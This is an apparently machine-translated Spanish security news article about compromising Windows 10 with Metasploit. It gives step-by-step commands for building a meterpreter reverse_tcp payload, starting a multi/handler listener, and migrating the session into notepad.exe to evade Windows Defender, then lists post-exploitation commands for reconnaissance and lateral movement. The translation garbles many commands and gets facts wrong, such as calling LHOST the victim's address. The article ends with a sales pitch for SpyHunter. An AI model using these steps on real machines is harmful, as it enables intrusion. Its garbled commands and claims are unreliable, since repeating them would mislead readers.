Casa > Ciber Noticias > Ventanas críticas 10 Vulnerabilidad - Multihandler Exploit
CYBER NOTICIAS

Ventanas crítico 10 Vulnerabilidad - Multihandler Exploit

Nombre Trojan:Win32 / Swrort
Escribe Trojan
Descripción breve Leer y escribir permisos en Windows 10. Permite al atacante para infectar otro ordenador conectado a la infectada.
Los síntomas Apareciendo de un archivo .exe desconocida.
Método de distribución Correos spam. Ataques MITM, redirecciones maliciosos.
Herramienta de detección Descargar SpyHunter, Para ver si su sistema ha sido afectado por Troya:Win32 / Swrort

p15_0000Un peligroso exploit ha sido descubierto en Windows 10, usando un Trojan:Win32 / Swrort para eludir Windows Defender y obtener permisos de lectura y escritura. Anonymous investigador ha demostrado la vulnerabilidad de un canal, llamada Metasploitstation. Él muestra 3 fases en las que se puede burlar de Windows 10 defensas. No hubo información descubierto hasta ahora sobre si esta hazaña ha sido fijado o ninguna.

Ventanas 10 Multihandler Exploit Infección – Cómo hacerlo?

En el video, el usuario experto en tecnología demostró una simulación de un archivo '123.exe' que crea y ejecuta como si se abrió en el mundo real como un archivo adjunto a un correo electrónico o ejecutado por otro método. Hemos decidido dividir el proceso de infección en tres fases para ayudar a comprender mejor la metodología.

Fase 1: Preparación del archivo

El hacker crea una carga útil con esta configuración en un entorno Linux:

msfpaayload ventanas / metro sobrenatural / reverse_tcp LHOST = Lport = x> / home / awer / Nueva carpeta / 123.exe

portnumber1 * – Este es el puerto utilizado para el ataque. Puede ser cualquier puerto (4444, 4324, etc). Hemos escrito portnumber1 ya que utiliza un segundo número de puerto que nombramos después.

Después de esta fase es completa y el archivo es creado por el atacante y se dejó caer en el sistema del usuario, el atacante puede proceder a la Fase 2.

Fase 2: El uso de la hazaña.

En este punto, el atacante utiliza MULTIHANDLER para hacerla ver el .exe y aprovechar el exploit para abrir una sesión activa(conectar) a la PC victima.

Esto puede ocurrir mediante las líneas de comandos actuales:

msfconsole (Para iniciar la consola. Abre 'msf>' interfaz)

En 'msf' el atacante puede ejecutar los siguientes comandos:

msf> uso exploit / multi / handler
conjunto lhost dirección IP de la víctima’
Lport Set 'portnumber1’

Después de esto, el atacante realiza la carga útil para establecer una sesión:

msfexploit(entrenador de animales)> ventanas set de carga útil / meterpreter / reverse_tcp

Para comprobar si una sesión activa es posible, el atacante escribe el comando msfexploit(entrenador de animales)> mostrar opciones que le permiten ver esta

→Proceso EXITFUNC sí técnica Salir(aceptado: seh, hilo..)
LHOST víctima dirección IP si La escucha puerto
Lport portnumber1 si La dirección de escuchar

Esto le permite ver que configurar los ajustes correctamente y puede proceder con la infección real del equipo.

Fase 3: Infección

El comando que el atacante utiliza para iniciar una sesión activa con la víctima es 'explotar'. Después de ejecutar este comando, el archivo '123.exe' volvió con esta respuesta:

[*] Manejador inversa Iniciado en
[*] Inicio del controlador de carga útil…

En este punto, el ejecutable se inició en la máquina de Windows. A pesar de que el software de Windows Defender se ejecuta, no se detuvo el ataque. Sin embargo cuando se escanea en busca de virus, el programa antivirus de Windows detectado inmediatamente '123.exe "como un troyano:Win32 / Swrort.A.

Para evitar la detección, el atacante utiliza una táctica, llamada migración que creó un archivo 'notepad.exe' que migra la sesión activa de '123.exe' a este archivo al conectarse. Esto se hizo con el comando:

meterpreter> después ejecutar / ventanas / gestionar / migrate

Después de migrar el proceso y repitiendo la misma simulación pero utilizando (puerto diferente), el atacante era de nuevo. Esta vez, cuando el atacante se puso en el PC no se detectó incluso después de Windows Defender hizo una exploración y el archivo '123.exe' todavía estaba presente en el equipo.

Desde allí, el atacante demostró completo de lectura y escribió permisos mediante la creación de una nueva carpeta con un nuevo documento de texto. Por lo que sabemos de los principales comandos que se pueden utilizar después de la conexión son:

> sysinfo - para mostrar la versión del sistema y la información.
> Dir :/ – para abrir cualquier directorio de destino.
> shell - para mostrar la versión de Windows y otra información.
> getwid - muestra Windows Id.
> ps -aux - muestra todos los archivos .exe que se ejecutan en el Administrador de tareas.
> ifconfig - muestra información sobre las interfaces (Direcciones IP y otra información). Este comando da al atacante la información para conectarse a otro equipo que está en la misma NIC y VLAN con la PC infectada. Esto puede ser muy devastador para las redes domésticas o de oficina en caso de ataque de este tipo es bien organizada.

Ventanas 10 Exploits – Conclusión

No hay información real sobre la conveniencia o no de esta hazaña ha sido fijado pero al igual que con cualquier otro software, puede haber otros más al descubierto. Por eso, en caso de que usted está utilizando Windows 10, le recomendamos que descargue e instale el programa de protección de malware avanzada. Le protegerá y actualizará regularmente con las últimas amenazas de forma activa. También, dicho programa tiene escudos activos que detectan inmediatamente las conexiones no autorizadas.

donload_now_250
Escáner Spy Hunter sólo detectará la amenaza. Si desea que la amenaza se elimine de forma automática, usted necesita comprar la versión completa de la herramienta anti-malware.Obtenga más información sobre la herramienta de SpyHunter Anti-Malware / Cómo desinstalar SpyHunter

Berta Bilbao

Berta es un investigador de malware dedicado, soñando por un espacio cibernético más seguro. Su fascinación con la seguridad que comenzó hace unos años, cuando un malware ella bloqueada fuera de su propio ordenador.

Más Mensajes

Dejar un comentario

Su dirección de correo electrónico no será publicada. Los campos necesarios están marcados *

This website uses cookies to improve user experience. By using our website you consent to all cookies in accordance with our política de privacidad.
Estoy de acuerdo